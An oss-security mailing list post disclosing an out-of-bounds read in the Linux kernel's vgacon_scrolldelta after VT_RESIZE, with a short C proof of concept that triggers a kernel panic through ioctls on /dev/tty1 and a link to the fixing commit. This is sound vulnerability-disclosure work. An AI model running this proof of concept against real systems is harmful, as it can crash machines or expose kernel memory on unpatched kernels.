oss-security - Linux Kernel: out-of-bounds reading in vgacon

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <CA+-U7QDboXJEpHXNa5mk-pOyBbKw63t8WefV5cmr+Hi8KsWeOQ@mail.gmail.com>
Date: Wed, 16 Sep 2020 16:19:46 +0800
From: NopNop Nop <nopitydays@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux Kernel: out-of-bounds reading in vgacon_scrolldelta

Hi,

We found a out-of-bounds reading in vgacon_scrolldelta. This BUG is caused
by "soff" being negative after VT_RESIZE.

Our PoC (panic with CONFIG_KASAN=y):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char** argv)
{
        int fd = open("/dev/tty1", O_RDWR, 0);

        unsigned short size[3] = {4, 0x254, 0};
        ioctl(fd, 0x5609, size);

        for (int i = 0; i < 110; i++) {
                write(fd, "\x0a", 1);
        }
        signed int args[3] = {13, -0x400, 0};
        ioctl(fd, 0x541c, args);
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=973c096f6a85e5b5f2a295126ba6928d9a6afd45

Regards,
Nop

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.